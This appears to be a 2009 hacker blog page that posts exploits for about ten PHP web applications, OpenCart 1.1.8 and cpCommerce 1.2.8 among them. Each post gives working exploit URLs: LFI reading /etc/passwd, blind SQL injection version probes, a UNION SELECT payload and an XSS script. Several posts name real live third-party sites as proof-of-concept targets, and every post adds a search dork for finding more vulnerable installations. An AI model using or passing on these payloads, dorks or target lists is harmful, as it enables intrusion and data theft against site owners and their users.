Opencart 1.1.8 LFI Injection Vuln  

Monday, April 27, 2009

[o] Opencart 1.1.8 LFI Injection Vulnerability
Title    : Opencart LFI Injection Vulnerability
Software : OpenCart opencart_v1.1.8
Vendor   : http://www.opencart.com/
Date     : 25 April 2009 ( Indonesia )
Author   : OoN_Boy
Contact  : oon.boy9@gmail.com
Blog     : http://oonboy.blogspot.com

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?route=[LFI]
http://localhost/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd

[o] Proof Of Concept
http://www.perebook.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd
http://store.thespaberry.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
"Powered by opencart"

[0] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny
Dan buat semuanya yg ga bisa di sebut satu²

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 1 comments

Links to this post

dB Masters' Curium CMS 1.03 Blind SQL Injection Vuln  

Saturday, April 25, 2009

[o] dB Masters' Curium CMS 1.03 Blind SQL Injection Vulnerability
Software : dB Masters' Curium CMS version 1.03
Vendor   : http://www.dbmasters.net/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?id=[SQL]
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=5

[o] Proof Of Concept
http://www.scacheerleaders.com/index.php?id=43%20and%20substring(@@version,1,1)=4 << id="43%20and%20substring(@@version,1,1)="5" id="5%20and%20substring(@@version,1,1)="4" id="5%20and%20substring(@@version,1,1)="5" style="font-weight: bold;">[o] Dork
"Powered by dB Masters' Curium CMS"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

FineArtPost SQL Injection & XSS Vulnerability  

Friday, April 24, 2009

[o] FineArtPost SQL Injection & XSS Vulnerability
Software : FineArtPost
Vendor   : http://www.fineartpost.com
Author   : OoN_Boy

[o] Vulnerable file
display_images.php

[o] Exploit
sql
http://target.com/[path]/display_images.php?u_id=[SQL]
xss
http://target.com/[path]/display_images.php?u_id=[Xss]

[0] Poc
http://www.ctbauer.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
http://www.ctbauer.com/public/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22

[o] Dork
"Powered by FineArtPost"

[o] Note
this a private script and all target is in one host

[O] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, NoGe, h4ntu, Opay, Ipay, Paman, reel, H312Y, pizzyroot,
xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem,
Dan buat semuanya yg ga bisa di sebut satu²

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 1 comments

Links to this post

EthicLinks SQL Injection and XSS Vuln  

Thursday, April 23, 2009

[o] EthicLinks SQL Injection and XSS Vulnerability
Software : EthicLinks
Vendor   : http://ethiclinks.com/
Author   : NoGe

[o] Vulnerable file
link.php
links.php
ethiclinks.php


[o] Exploit
http://localhost/[path]/link.php?cat_id=[SQL] & [XSS]

http://localhost/[path]/links.php?cat_id=[SQL] & [XSS]

http://localhost/[path]/ethiclinks.php?cat_id=[SQL] & [XSS]

[o] Dork
"Powered by EthicLinks"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 2 comments

Links to this post

Linkarity SQL Injection and XSS Vuln   

[o] Linkarity SQL Injection and XSS Vulnerability
Software : Linkarity
Vendor   : http://www.linkarity.com/
Author   : NoGe

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?cat_id=[SQL] & [XSS]

[o] Dork
"Powered by Linkarity"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

AuctionFrogs 2.0 SQL Injection Vuln  

Wednesday, April 22, 2009

[o] AuctionFrgos 2.0 Blind SQL Injection Vulnerability
Software : AuctionFrogs version 2.0
Vendor   : http://auctionfrogs.org/
Author   : NoGe

[o] Vulnerable file
item.php

[o] Exploit
http://localhost/[path]/item.php?id=[SQL]
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=5

[o] Dork
"Powered by the Auctionfrogs"

[o] Note
this a private script and all target is in one host

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

wsCMS Blind SQL Injection Vuln  

Saturday, April 18, 2009

[o] wsCMS Blind SQL Injection Vulnerability
Software : wsCMS
Vendor   : http://www.websolutions.ca/
Author   : NoGe

[o] Vulnerable file
gallery.php
programs.php
news.php
stories.php
events.php

all file above affected by "id" parameter

[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5

[o] Dork
"Powered by wsCMS"

[o] Note
this a private script

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 1 comments

Links to this post

eXopera Blind SQL Injection Vuln  

Friday, April 17, 2009

[o] eXopera Blind SQL Injection Vulnerability
Software : eXopera
Vendor   : http://www.exopera.be/
Author   : NoGe

[o] Vulnerable file
product.php

[o] Exploit
http://localhost/[path]/product.php?catid=[SQL]
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=4
http://localhost/[path]/product.php?catid=1 and substring(@@version,1,1)=5

[o] Dork
"Powered by eXopera"

[o] Note
this a private script

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

cpCommerce 1.2.8 Blind SQL Injection Vuln  

Thursday, April 16, 2009

[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability
Software : cpC0mmerce version 1.2.8
Vendor   : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author   : NoGe

[o] Vulnerable file
document.php

[o] Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5

[o] Dork
"Powered by cpCommerce"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 1 comments

Links to this post

FreznoShop 1.3.0 - SQL Injection Vuln  

Monday, April 13, 2009

[o] FreznoShop 1.3.0 SQL Injection Vulnerability
Software : FreznoShop version 1.3.0
Vendor   : http://sourceforge.net/projects/freznoshop/
Download : http://sourceforge.net/project/platformdownload.php?group_id=86090
Author   : NoGe

[o] Vulnerable file
product_details.php

[o] Exploit
http://localhost/[path]/product_details.php?id=[SQL]

[o] Dork
"Powered by FreznoShop"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Subscribe to: Posts (Atom)

[d]esign by Amanda [e]dited by NoGe